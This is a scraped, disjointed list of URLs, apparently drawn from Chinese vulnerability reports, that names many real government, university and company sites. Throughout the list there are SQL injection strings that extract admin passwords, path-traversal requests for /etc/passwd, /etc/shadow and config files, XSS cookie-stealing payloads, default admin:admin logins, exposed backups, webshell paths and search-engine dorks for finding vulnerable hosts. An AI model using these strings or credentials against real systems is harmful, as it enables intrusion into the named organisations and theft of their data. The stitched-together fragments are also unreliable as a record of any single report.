http://tuanwei.hbu.edu.cn/tzb_old/ForgetPwd.asp?state=getUsername^Submit= http://tuanwei.hbu.edu.cn/tzb_old/more.asp?class=99999999 http://119.84.60.43:9000/superadmin/index.action http://www.sy440.com/ http://demo.yuncart.com/index.php http://gspa.nwnu.edu.cn/tszy/ http://gspa.nwnu.edu.cn/)的后台地址在网站底部有链接,但是由于需要输入管理员认证码所以弱口令的威胁减小 http://blog.vip.com/blog.php?act=content&id=3318 http://www.chysoft.net/case.asp http://183.61.183.189:81/ http://183.61.183.189:81/innet/assets/addkcbf.jsp?zckc_guid_0=1&guid=-1 http://59.46.195.190:8080/OAapp/WebObjects/OAapp.woa http://221.231.10.244/manager/html http://101.69.251.138:8888 http://lib.utibet.edu.cn/notice_duzhe.jsp?tid=tz20131115_2257 http://www.szenjie.com/ inurl:fo/home.jsp http://www.sztoxda.com/ http://www.chinatapes.com/ http://www.zkchina.com.cn/ http://www.dzydz.com/ http://www.szhms.com.cn/ http://www.szjscctv.cn/ http://www.huazengkeji.com/ http://www.sz-hws.com/ http://www.360ddz.cn/ http://www.wiseteam.net/ http://www.jcr-sensor.com/ http://www.eclink.net.cn/ http://www.jiasofa.com/ http://www.cstuniversal.com/ http://www.szkzg.com.cn/ http://website/common/uploadFile.do?fileType=productDesc http://website/common/uploadFile.do?fileType=productDesc height:20px;BORDER http://website/upload/img/productDesc/文件名.jsp) http://www.sdaxue.com/.svn/entries http://www.atwasoft.com/ http://www.xngjj.gov.cn/Website/filelist.jsp?ColumnCode=01 http://www.xngjj.gov.cn/Website/advisoryshow.jsp?id=8440 http://www.xngjj.gov.cn/Website/newsList.jsp?ColumnCode=m0101 http://www.xngjj.gov.cn/Website/advisorylist.jsp?zx=1 http://www.ykzfgjj.com/Website/newslist.jsp?ColumnCode=m0201 http://www.ykzfgjj.com/Website/filelist.jsp?ColumnCode=02 http://www.ykzfgjj.com/Website/newsshowphoto.jsp?ColumnCode=l07 http://www.ykzfgjj.com/Website/Advisory.jsp?ColumnCode=1001 http://www.ykzfgjj.com/Website/WstcNewslist.jsp?ColumnCode=1 http://www.ykzfgjj.com/Website/newslistm8001.jsp?ColumnCode=m8001 http://www.ykzfgjj.com/Website/jlhd01.jsp?id=1 http://www.jmszfgjj.com/Website/WstcNewslist.jsp?ColumnCode=1 http://www.jmszfgjj.com/Website/OnlineSurveyResults.jsp?idhao=1 http://www.spgjj.com/Website/newslist.jsp?ColumnCode=m0102 http://www.spgjj.com/Website/jgjj01.jsp?file=05 http://www.spgjj.com/Website/newsshowphoto.jsp?ColumnCode=m0805 http://www.spgjj.com/Website/filelist.jsp?ColumnCode=m0401&file=03 http://www.lygjj.gov.cn/Website/newslist.jsp?ColumnCode=m0102 http://www.lygjj.gov.cn/Website/filelist.jsp?ColumnCode=m0401&file=03 http://www.lygjj.gov.cn/Website/newsshowphoto.jsp?ColumnCode=m0805 http://www.lygjj.gov.cn/Website/fileshow1.jsp?file=03&id=16 http://www.lygjj.gov.cn/Website/contentshow.jsp?ColumnCode=m0301 http://www.hhgjj.net/Website/filelist.jsp?ColumnCode=02 http://www.hhgjj.net/Website/WstcNewslist.jsp?ColumnCode=1 http://www.hljszgjj.com/portal/tzgg.jsp?id=18 http://www.hljszgjj.com/portal/kfsList.jsp?wa_tb701=l02 http://www.hljszgjj.com/portal/yjjdXX.jsp?id=13 http://www.sysgjj.com/Website/fileshow.jsp?id=5 http://www.sysgjj.com/Website/filelist.jsp?ColumnCode=02 http://www.sysgjj.com/Website/newsshowphoto.jsp?ColumnCode=l07 http://www.tygjj.com/Website/filelist.jsp?ColumnCode=01 http://www.tygjj.com/Website/zxlist.jsp?ColumnCode=m0101 http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449 http://beida.yaofang.cn/index.php/admin/index http://hcm.yonyou.com/d.aspx http://hcm.yonyou.com/123.asa;.txt http://hcm.yonyou.com/shell.asp http://hcm.yonyou.com:80/222.rar http://www.ie.zjut.edu.cn/embed/jpadmin/managelogin.asp http://demo.dtcms.net/ http://www3.jynews.net/dianli/chaxun.asp?flag=1 http://www3.jynews.net/dianli/viewarticle.asp?id=81 http://www3.jynews.net/dianli/viewarticle.asp?id=80 http://www3.jynews.net/dianli/chaxun.asp?flag=1&select=201408 http://www.52pcb.com/ http://127.0.0.1/ajax/form.aspx?publishmentSystemID=1&action=addPost http://127.0.0.1/ajax/form.aspx?publishmentSystemID=1&action=postAllInOne http://www.cs-airport.com/BusinessDetails.aspx?id=48&iid=225 http://www.cs-airport.com/CSWap/OnlineArticleW.aspx?h=y&t=22&id=226 http://www.cs-airport.com/OnlineArticle.aspx?t=22&id=226 http://www.dgaic.gov.cn/searchArticle.jsp?id=20000021&type=0&name=%D5%FE%CE%F1%B9%AB%BF%AA&searchType=1&searchValue=1&imageField.x=0&imageField.y=0 http://gaokao.gszs.cn/ http://jygl.seentao.com/ http://www.ynnu.edu.cn/admin/databak/data_ynnu/bak07-06-17-8-13-47/ http://www.ynnu.edu.cn/admin/databak/data_ynnu/bak07-09-22-22-04-37/ http://www.ynnu.edu.cn/admin/uploadfile/201308/ http://www.ynnu.edu.cn/admin/uploadfile/201307/ url:http://218.104.65.228:8081/manager/html user:admin pass:admin http://ec.yonyou.com http://www.wowsai.com/ http://edm.wowsai.com/pma/ http://www.beijing-hyundai.com.cn/quality/t/t.aspx?id=395 http://kyc.blcu.edu.cn/xmsb/indexAction!to_index.action inurl:about/show.php inurl:show.php?lang=cn&id=19 http://192.168.2.1/advance.asp即可不经过帐号密码的认证直接获得管理员权限,进行管理操作。 http://adsite2.rayli.com.cn/RayLi_XianF/ http://www.yaofang.cn/doctor_msg.php?chat_id=3 http://123.232.123.16:9080/QCWEB/qcQueryListAction!getList.do http://www.hljdep.gov.cn/dc1_view.php?tpid=2 http://cs.nenu.edu.cn/web.rar https://i.mi.com/ https://i.mi.com/ um:admin pw:admin http://219.153.125.197:8080/ http://www.chlyj.gov.cn/MANAGE/uploadify/demo.asp http://air.fjemc.org.cn/sys/ http://air.fjemc.org.cn/files/ http://ugc.moji001.com/mapi/ResetPasswordBefore?E268443E43D93DAB7EBEF303BBE9642F={{mail}}&07CC694B9B3FC636710FA08B6922C42B={{timestamp}}&lan=CH http://ugc.moji001.com/sns/ResetPasswordBefore?E268443E43D93DAB7EBEF303BBE9642F={{mail}}&07CC694B9B3FC636710FA08B6922C42B={{timestamp}}&9941E268A0F6F8E2AA2898B5A522D23D={{??}}&lan=CH http://www.luminway.com/ www.luminway.com http://113.108.193.123:8089/cop http://www.colorwork.com/#create创建团队 http://www.zdpri.cn/news.asp?id=4715 http://admin.ifttt.gfan.com/ http://dj.cec.com.cn/download.Action http://pay.75510010.com:7002/ePay/rand.action http://si.chinaunicom.cn/admin/index.jsp http://hrclub.51job.com/ http://fans.51job.com/ http://hrclub.51job.com/blog/user_post.asp) http://bbs.crecg.com/portal/index.aspx http://bbs.crecg.com/Portal/fckeditor/editor/filemanager/connectors/test.html http://117.22.254.102:9999/ http://117.22.254.102:9999/zentao/user-login-L3plbnRhby8=.html http://117.22.254.102:9999/sqlbuddy/#page=home http://210.35.72.97/ pic.cnnb.com.cn/login.php ftp://www.lccz.gov.cn/ https://appleid.apple.com/signin并没有出现验证码,也没有传说中的临时锁定我的账号? https://www.icloud.com/上,也是如此。 http://www.bzgtjt.com/brow.asp?classid=20 http://www.bzgtjt.com/brow.asp?classid=20%20and%201=1,发现存在waf,不过waf http://www.bzgtjt.com/brow.asp?classid=20 http://www.bzzdrz.com/brow.asp?classid=4 www.bzzdrz.com/brow.asp?classid=4 http://www.bzzdrz.com/brow.asp?classid=4 http://www.bzsly.gov.cn/brow.asp?classid=4%E2%80%98 http://s.haier.com/haier/showDemands.action http://s.haier.com/haier/rain.jsp http://dp.china-airlines.com/inbound/TWE/html/ATT0.jsp?id=C1_315081800H_000030 http://sh.lezi.com/arc_list.php?tid=3 url:http://202.109.191.208:8081/ user:admin http://mail.hljzx.gov.cn/ http://old.e8088.com/1.rar于是下载下来查看。发现是数据库备份,管理员太马虎了。 http://old.e8088.com/1.rar http://220.250.64.123/zhtypeset/ http://220.250.64.123/admin.jsp http://220.250.64.123/top.jsp http://bbs.dota2.com.cn/ http://221.228.210.187:8080/log/ http://210.72.13.129 http://www.263em.com/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a http://www.srm.foxconn.com/fckeditor/editor/filemanager/connectors/test.html http://123.124.249.86/zjk/admin/ http://123.124.249.86/zjk/admin/User.aspx http://219.143.118.86/TZGG/Handler/DownloadFile.ashx?path=../../web.config http://219.143.252.238:90 www.lepao.com http://www.konkamobile.com/news.aspx?TypeId=10 http://www.cits.com.cn/ http://www.cits.com.cn/cits/membercenter/password/getpassword.html?sendTime=**********&userValue=**********&userType=ZW1haWw=&submitType=emailResetpws http://mail.comingchina.com/webmail/client/cache/78655/letterpaper_1_thumb.jpg http://mail.comingchina.com/webmail/client/cache/78655/letterpaper_1.jpg http://mail.comingchina.com/webmail/client/cache/78655/letterpaper_1.jpg/.php http://211.64.192.44:8080/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../conf/resin.conf https://202.102.36.209/index.php,由于noscript默认禁止加载此网站的脚本,所以浏览器不会跳转: http://mail.21cn.com/help/freemail/main3.html?url=javascript:alert%28document.cookie%29 data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== http://mail.21cn.com/help/freemail/main3.html?url=javascript:alert%28document.cookie%29 url:http://58.213.50.110:8081/manager/html user:admin pass:admin http://jgsfzx.hbue.edu.cn/syzx.asp?id=13 http://jgsfzx.hbue.edu.cn/news_show.asp?id=182 http://jgsfzx.hbue.edu.cn/admin/login.asp http://www.nnfcdj.com/phpcms/admin/存在目录遍历。 www.aqcoop.gov.cn/dc_detail.phpid=9 www.aqsb.com.cn/dc_detail.phpid=9注入地址.问题出在投票时的参数vv未过滤,直接导致了注入。 http://www.aqcoop.gov.cn/dc_detail_save.php https://114.255.154.77/por/service.csp?rnd=dkofoomhkfmemja http://zhihui.189hz.com/ http://zhihui.189hz.com/marry/mp_index.action http://124.128.202.203:8899/JYJCWEB/webSpYouxiaoListAction!getList.do http://lexue.yonyou.com http://lexue.yonyou.com/News_1.aspx?newsid=10 http://fw.qqhr.gov.cn/fw_more.php?fw_id=37 http://www.qqhr.gov.cn/login.jsp http://glpt.sxaj.gov.cn/admin/Default.aspx username:admin password:admin http://gotonju.nju.edu.cn/console.do http://122.119.120.18:8180/admin-console/ http://122.119.120.18:8180/umetripcki/umetripcki/login.jsp http://m.umetrip.com/i/a http://122.119.120.18:8180/umetripcki/umetripcki/login.jsp http://ecc.tencent.com/ http://www.xmhcyy.com/disp.action http://www.xmhcyy.com/disp.action?redirect:Http://www.baidu.com http://www.xmhcyy.com/admin/login.jsp http://www.xmhcyy.com/ckfinder/ckfinder.html http://mail.eqsc.gov.cn/ http://ngo.nandu.com/info/detail/id/699 http://mail.zsc.edu.cn/zsc.edu.cn.txt http://mail.zhanjiang.gov.cn/ http://www.zzdtv.cn/ http://www.zzdtv.cn/login.asp http://www.zzdtv.cn/article_view.asp?id=663 http://labs.chinamobile.com/check_login.php?url=http%3A%2F%2Flabs.chinamobile.com%2F http://www.fjtic.com.cn/?app=search http://quote.futures.hexun.com/2010/spotmarket_xml.ashx?breed=Au9999 http://jjc.xjedu.gov.cn http://58.213.129.227/Login.aspx http://210.51.19.141/programupload/ http://fresh.haier.com/ http://fresh.haier.com/info/index/9插入评论 https://202.102.36.209/file/db.inf http://hc.csdn.net/ajax/red_num http://www.dl-huawen.com/ www.idcw.com/news/help_detail.asp?Id=406 http://answer.tongyi.com/index.php/question/xxmyask?id=99755 http://moa.scal.com.cn http://moa.scal.com.cn/test/Test1.aspx http://www.jhccb.com.cn/x.txt http://210.42.38.2/zcc/ http://210.42.38.2/zcc/news.php?id=2970 http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=(参数随机) http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=51 http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=52 http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=53 http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=54 http://sfj.kyqq.gov.cn/list.aspx?id=50 http://sfj.kyqq.gov.cn/content.aspx?id=261 http://keqz.kyqq.gov.cn/List.aspx?id=65 http://keqz.kyqq.gov.cn/List.aspx?id=65 www.zhangye.gov.cn/Department/public/PublicInfo.aspx?Id=704&DepartmentID=3&NodeID=436 http://cz.zhangye.gov.cn/Department/Public/PublicInfo.aspx?Id=2730&DepartmentID=2&NodeID=435 http://wjj.zhangye.gov.cn/Department/Public/PublicInfo.aspx?Id=2049&DepartmentID=55&NodeID=547 http://aj.zhangye.gov.cn/Department/Public/PublicInfo.aspx?Id=1719&DepartmentID=19&NodeID=545 http://kp.zhangye.gov.cn/Department/Public/PublicInfo.aspx?Id=2848&DepartmentID=42&NodeID=533 http://fzb.zhangye.gov.cn/Department/Public/PublicInfo.aspx?Id=805&DepartmentID=25&NodeID=541 http://www.sciencep.com/s_third_list.php?id=670 http://www.najyj.net/ http://www.najyj.net/09_zxjy/bmgk_index.htm http://najxzjb.30edu.com/ http://prep.shenzhenair.com/ http://prep.airkunming.com/ http://wan.renren.com/dota/bar.html?gameUrl=http://login.taobao.com http://wan.renren.com/csj/bar.html?gameUrl=http://www.baidu.com http://wan.renren.com/dxz/bar.html?gameUrl=http://www.baidu.com http://wan.renren.com/djh/bar.html?gameUrl=http://baidu.com http://wan.renren.com/dpcq/bar.html?gameUrl=http://baidu.com http://wan.renren.com/dxz/bar.html?gameUrl=http://baidu.com http://wan.renren.com/l/bar.html?gameUrl=http://baidu.com http://wan.renren.com/lstx/bar.html?gameUrl=http://baidu.com http://wan.renren.com/jzsg/bar.html?gameUrl=http://baidu.com http://wan.renren.com/war/bar.html?gameUrl=http://baidu.com http://wan.renren.com/rrmj/bar.html?gameUrl=http://baidu.com http://wan.renren.com/shenqu/bar.html?gameUrl=http://baidu.com http://wan.renren.com/war/bar.html?gameUrl=http://baidu.com http://wan.renren.com/dxz/bar.html?gameUrl=javascript:alert%28/xss/%29// http://blog.csdn.net/hyy044101331/common/report?id=4192785&t=3&floor=1 http://oa.hzuf.com:9090/assetsReport/assetsDetails.jsp?assetsNo=11 http://gzwnq.88ip.cn:9090/assetsReport/assetsDetails.jsp?assetsNo=11 http://oa.linya.cn:9099/assetsReport/assetsDetails.jsp?assetsNo=11 http://fm.eyesoffice.com:9090/assetsReport/assetsDetails.jsp?assetsNo=11 http://oa.shunhengli.com:9090/assetsReport/assetsDetails.jsp?assetsNo=11 intitle:FE协作办公平台 http://oa.shunhengli.com:9090/carManager/carUseDetailList.jsp?CAR_BRAND_NO=A59C58 intitle:FE协作办公平台5.5 http://oa.hzuf.com:9090/cooperate/flow/loadInforData.jsp?guid=1 intitle:FE协作办公平台5.5 http://oa.shunhengli.com:9090/feform/createprinttemplete.jsp?formid=1 http://www.kingsoft.com/ckplayer/video.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 wxy.hqu.edu.cn/hqdx/szll_2.asp?id=140,可扫描出用户账户密码 http://gk.tj.gov.cn/天津市政府信息公开系统 http://zwgk.tjhexi.gov.cn/河西区政府信息公开系统 http://60.29.57.38/和平区政府信息公开系统 http://zwgk.tjhd.gov.cn/河东区政府信息公开系统 http://gk.tjhbq.gov.cn/河北区政府信息公开系统 http://gk.tjnk.gov.cn/南开区政府信息公开系统 http://gk.tjhqqzf.gov.cn/ConInfoParticular.jsp?id=2015 http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367 http://zwgk.tjhd.gov.cn:8000/ConInfoParticular.jsp?id=1909 http://202.99.99.30/ConInfoParticular.jsp?id=2194 http://zfxxgk.bh.gov.cn/ConInfoParticular.jsp?id=7616 http://60.30.65.156/ConInfoParticular.jsp?id=2454 http://xxgk.tjbc.cn/ConInfoParticular.jsp?id=5889 http://xinxigk.baodi.gov.cn/ConInfoParticular.jsp?id=2357 http://60.28.129.212/ConInfoParticular.jsp?id=10621 http://27.112.1.56/ConInfoParticular.jsp?id=15205 http://www.jzrsrc.gov.cn/onetree.asp http://www.jzrsrc.gov.cn/news/SCNews.mdb http://www.jzrsrc.gov.cn/news/login.asp http://www.xsdrfid.com/fanan_info.asp?ID=8 http://www.infojiading.cn/index.asp http://nps.mychery.com http://ps.beijing-hualian.com/application/application/sxps/order_line_sb.asp?fsuppl_no=21639&fstoregeno=41001&fpsordno=2014130150&fordno=214850 http://www.anquan.org/authenticate/cert/?site=www.cjk3d.net&at=personal http://www.anquan.org/authenticate/cert/?site=www.cjk3d.net&at=official http://www.baidu.com/s?ie=utf-8&wd=inurl%3Ahttp%3A%2F%2Fwww.anquan.org%2Fauthenticate%2Fcert%2F%3Fsite&tn=baiduhome_pg&oq=inurl%3Ahttp%3A%2F%2Fwww.anquan.org%2Fauthenticate%2Fcert%2F%3Fsite&rsv_spt=1&issp=1&rsv_bp=0&pn=0 http://121.12.117.111:9231/v2014-admin/adminv2014admin/admin_user_detail.asp?intUserId=5961 http://au.iqiyi.com/public/ http://au.iqiyi.com/conf/ http://au.iqiyi.com/conf/appconfig.php http://au.iqiyi.com/lib/Service/SecKill/seckill.sql http://au.iqiyi.com/index.php?m=Login&a=login&type= http://220.249.194.22/indexAction.action http://202.199.155.111:8080/pdms/mainPage.action http://www.aydzjc.gov.cn/indexAction.action http://online.wl-expo.com/newscenter/indexAction.action http://www.aunipex.com/IndexAction.action http://ztb.hnwr.gov.cn/module/bidpub/announcement-notice!findByKeyDetail.action http://www.zuzhirenshi.com/GetInfo.action http://121.12.117.111:9231/v2014-admin/adminv2014admin/admin_admin_add_save.asp http://121.12.117.111:9231/v2014-admin/adminv2014admin/admin_admin_add_save.asp?iptAccount=管理员名称&selLevel=1&selStatus=0&iptPassword=管理员密码&iptPassword2=第二遍确认密码&submit=%E6%8F%90+%E4%BA%A4 http://t.cn/RPRNHuB http://www.bjfsjy.com/lanmu_news.asp?lanmu_id=65 http://www.bjfsjy.com/product_cat.asp?catid=106 http://www.bjfsjy.com/product_z.asp?product_id=84 http://www.bjxtac.com/lanmu_news.asp?lanmu_id=41 http://www.bjxtac.com/product_cat.asp?catid=63 http://www.bjxtac.com/news_z.asp?news_id=220 http://www.bjxtac.com/product_z.asp?product_id=60 http://www.65342222.com/7/lanmu_news.asp?lanmu_id=41 http://www.65342222.com/7/product_z.asp?product_id=58 http://www.hebaoxianlan.com/lanmu_news.asp?lanmu_id=74 http://www.hebaoxianlan.com/product_z.asp?product_id=137 http://www.hebaoxianlan.com/news_z.asp?news_id=162 http://www.hebaoxianlan.com/product_cat.asp?catid=63 http://www.shoukong.net.cn/product_cat.asp?catid=63 http://www.shoukong.net.cn/news_z.asp?news_id=250 http://www.shoukong.net.cn/lanmu_news.asp?lanmu_id=42 http://www.shoukong.net.cn/product_z.asp?product_id=60 http://www.xishantulangzhong.com/lanmu_news.asp?lanmu_id=65 http://www.xishantulangzhong.com/product_z.asp?product_id=84 http://www.xishantulangzhong.com/product_cat.asp?catid=106 http://www.xishantulangzhong.com/news_z.asp?news_id=408 http://gxba.bjfsba.com/news_z.asp?news_id=220 http://gxba.bjfsba.com/lanmu_news.asp?lanmu_id=41 http://gxba.bjfsba.com/product_z.asp?product_id=60 http://gxba.bjfsba.com/product_cat.asp?catid=63 http://www.jgydk.com/lanmu_news.asp?lanmu_id=51 http://www.jgydk.com/news_z.asp?news_id=208 http://www.bjzjgh.com/lanmu_news.asp?lanmu_id=74 http://www.bjzjgh.com/product_cat.asp?catid=63 http://www.bjzjgh.com/product_z.asp?product_id=69 http://www.bjzjgh.com/news_z.asp?news_id=149 http://www.bjshine.cn/product_cat.asp?catid=63 http://www.bjshine.cn/news_z.asp?news_id=175 http://www.hlyc.cn/lanmu_news.asp?lanmu_id=41 http://www.hlyc.cn/product_cat.asp?catid=63 http://www.hlyc.cn/product_z.asp?product_id=156 http://www.hlyc.cn/news_z.asp?news_id=512 www.haohuiyi.com http://vip13.haohuiyi.net)存在struts2漏洞。。直接导致站点getwebshell jdbc:mysql://haohuiyi.mysql.rds.aliyuncs.com:3306/haohuiyio?autoReconnect=true jdbc:mysql://haohuiyi.mysql.rds.aliyuncs.com:3306/haohuiyio?autoReconnect=true http://www.centit.com/ http://www.ldzsc.gov.cn/ http://218.92.49.74:8090/ganyunet/ http://218.92.50.139:8082/lygdhnet/ http://218.92.62.78/gnnet/ http://218.92.14.22/gynet/ http://61.132.0.36:8090/lygnet/ http://tcfdc.net:80/bzxzf/bz.aspx?sort=123,你们更专业,我路过看看的。 http://wenming.chinadaily.com.cn/VideoList.aspx?sole=20140113174715584 http://person.huibo.com/register/CheckEmail/ https://58.211.152.245/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://openapi.qzone.qq.com/crossdomain.xml http://wooyun.org/bugs/wooyun-2014-062461 http://给.pw/getqq/ http://ptcms.csdn.net/article/service/article_count?preview=1&aid=2821253&jsonpcallback=jQuery1910565352892735973_1408438433889&_=1408438433890 http://gaj.laixi.gov.cn/view.jsp?id=78002 http://tjj.laixi.gov.cn/view.jsp?id=77219 http://www.12308.com/help/search.sc?searchKey= http://www.hrbcb.com.cn/card/merchant.do?attach=../..//../..//../..//../..//../..//../..//../..//../..//etc/shadow&method=attachDown www.cdce.cn)渗透测试: http://www.fhoaf.gov.cn/admin/admin_login.asp http://math.ytu.edu.cn/math/test/ www.sjzpinfo.net/csbm/zjc/dacx.asp www.sjzpinfo.net/csbm/zjc/dacx.asp http://xgcbysda.gxu.edu.cn/ http://58.192.114.32/setup/search.aspx xsc.jhun.edu.cn/bys/dacx.asp http://xsc.jhun.edu.cn/bys/guanli.asp?name=&pws= http://oa.515158.com http://oa.515158.com/ntko/FileEdit.php?fileType=word&FileId=51515800000&filenumber=514238140820103755&officetype=1&uid=2&date=2014-08-20%2010:37:55 http://oa.515158.com/admin.php?ischeck=&ac=file_read&do=list&fileurl=file&vuidtype=&type=1&number=&title=&vstartdate=&venddate= http://oa.515158.com/admin.php?ischeck=&ac=file_read&do=list&fileurl=file&vuidtype=&type=1&number=&title=&vstartdate=&venddate= http://oa.515158.com/admin.php?ac=department&fileurl=wage&do=log&wid=132 http://oa.515158.com/admin.php?ac=department&fileurl=wage&do=log&wid=132 http://yjsgl.ncu.edu.cn/pub!list.action http://www.rasp.gov.cn/was/was/web/wzruian/wssp/checkAcc.jsp?username=a http://www.yjsp.gov.cn/was/was/web/wzyongjia/wssp/checkAcc.jsp?username=a http://122.228.149.62:8787/was/was/web/wzpingyang/wssp/checkAcc.jsp?username=a d.363.com/phpcms/明显phpcms www.363.com官网也在上面 http://wgb.tx100.com/login.action inurl:/BBS/topic.jsp?sectionId= http://qb3z.mhedu.sh.cn/webschool/BBS/topic.jsp?sectionId=ebbs02&boardI http://www.sqlmap.org http://www.yjsp.gov.cn/was/ptlAccount.action http://www.rasp.gov.cn/was/ptlAccount.action http://122.228.149.62:8787/was/ptlAccount.action http://www.wintalent.com/ http://zhaopin.jd.com/ http://talent.baidu.com/ www.hotjob.cn http://zhaopin.jd.com/ http://travel.chinadaily.com.cn/events/eventinfo?e_id= xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType http://tzb.hebut.edu.cn/list.php?tid=1&type=50tid=1 http://tzb.hebut.edu.cn/tzb_oldweb/xsnews/edit/uploadfile/ku.php http://fao.hebut.edu.cn/xiazai.php?flag=1 http://gy.evergrande.com/ObjectHouseInfo.aspx?ID=13 http://battery.tcl.com/read_news.php?id=38 http://www.imooc.com/code/858 http://php.mukewang.com/858-7566546/wooyun.php http://www.gkj.dl.gov.cn/phpmyadmin/ http://house.szibr.com:8000/src/acloglogin.php http://house.szibr.com:8000/src/sqlclient.php http://segmentfault.com/q/1010000000489007#a-1020000000642886 http://u.sohu.com/downloadfile.action http://goucai.touzhu.cn/actinfo/news_39692.html http://goucai.touzhu.cn/actinfo/news_39692 http://goucai.touzhu.cn/actinfo/news_39692 http://test.wenwen.sogou.com/ http://test.wenwen.sogou.com/cat/ http://test.wenwen.sogou.com/s/manager.action http://test.wenwen.sogou.com/portal/index.jsp http://www.lppz.com/member/emailvalidatesuccess.jsp?userId=u_1 http://www.hlau.cn/un/buchu/baowei/admin/index.php http://shop.vmalltop.com http://shop.admin.vmalltop.com/Login/index http://112.65.141.202/Home/login http://www.js165.com/res/admin/ http://www.js165.com/res/admin/list_file.aspx http://nlp.blcu.edu.cn/others/cet/Other/SearchHZ/search.php?page=2&num=10%27%20and%20%27%27=%27&zi= http://nlp.blcu.edu.cn/others/cet/Other/SearchHZ/search.php?page=2&num=10%27%20and%20%271%27=%27&zi= http://nlp.blcu.edu.cn/others/cet/Other/SearchHZ/one.php http://218.61.12.210/ http://www.xmwsrc.com/admin/fckeditor http://www.xmwsrc.com/admin/fckeditor/_samples/default.html http://www.xmwsrc.com/UploadFiles/file/1.asp/asp.jpg http://www.xmwsrc.com/UploadFiles/file/1.cer/hlnjwl.jpg http://jiuye.nwu.edu.cn/login/xx/add.jsp?lx= inurl:/ws2004/ inurl:/vc2003/login/ inurl:Flight/InternationalTicket.asp http://www.tokair.com/ http://www.yichenghk.cn www.yichenghk.cn inurl:Visa/VisaSerchInfo.asp http://222.68.17.232:8080/ http://mail.wugang.gov.cn http://mail.chinaexpressair.com/ http://www.krrj.cn/ http://www.krrj.cn/download/aiov7.exe http://service.wanmei.com/faxservice/toPrint.do?serviceNo=1365171718702 http://service.wanmei.com/faxservice/toPrint.do?serviceNo=1365171718702%27%20and%20%271%27=%271 http://bar.2144.cn/home/message/uid/61054556 http://bar.2144.cn/home/message/uid/61054556 http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%24 http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$ to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$ http://211.82.175.10//admin/FCKeditor/editor/filemanager/upload/test.html http://bbs.51job.com/attachment/upload/76/1408976.jpg http://ms.hinews.cn/page-42006.html http://61.156.3.68/Login.aspx http://61.156.3.89:8100/ http://61.156.3.89:8100/ldcp/AdminLogin.asp http://61.156.3.89:8100/fzcp/main.asp http://61.156.3.89:8100/ldcp/main.asp http://61.156.3.89:8100/ygcp/cs3.asp http://61.177.86.27:8080/jmx-console/ http://61.177.86.27:8080/zecmd/zecmd.jsp encap:Ethernet D3:26:08 addr:132.228.36.82 Bcast:132.228.36.95 Mask:255.255.255.240 fed3:2608/64 Scope:Link MTU:1500 packets:1321060332 dropped:1818 packets:358858752 txqueuelen:1000 http://www.xiangtan.gov.cn/comm/jdft/interviewimg/20140821011858461.jsp Google:admin/manager/admin_voting_show.php http://183.238.102.120:8080/vtsidcard/ http://58.248.32.37/Login.aspx http://58.248.32.37/Login.aspx http://t2d.ntalker.com/func/imagetrans/image.php?f=YWFhLnBuZw==&q=L2ltYWdlc2F2ZS90ZW1wL2tmXzk4MTcvZWI5ZmNhZmNlMmYxOTNlNzM2YzBmNjBmMjk1YjgzODAxNDA4NTk4Njc2LnBuZw==","oldfile":"aaa.png","size":"4.36 http://t2d.ntalker.com/func/imagetrans/download.php?f=YWFhLnBuZw==&q=L2ltYWdlc2F2ZS90ZW1wL2tmXzk4MTcvZWI5ZmNhZmNlMmYxOTNlNzM2YzBmNjBmMjk1YjgzODAxNDA4NTk4Njc2LnBuZw== http://xccbank.com/html/ http://xccbank.com/admin.php?mod=phpcms&file=login http://www.xccbank.com:8181/kingpa/library/login.jsp http://www.xccbank.com:8080/kingpa/login.jsp http://xccbank.com/phpmyadmin/ http://xccbank.com/phpinfo.php http://xccbank.com/data/bakup/ http://www.wooyun.org/bugs/wooyun-2014-073346/trace/7b217977d57cfdc8feda573f8d0eb4ee inurl:out.do?viewType= http://www.hrbcdc.com/admin/ file:///etc/passwd xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006 xmlns:o="urn:schemas-microsoft-com:office:office xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math xmlns:v="urn:schemas-microsoft-com:vml xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing xmlns:w10="urn:schemas-microsoft-com:office:word xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main 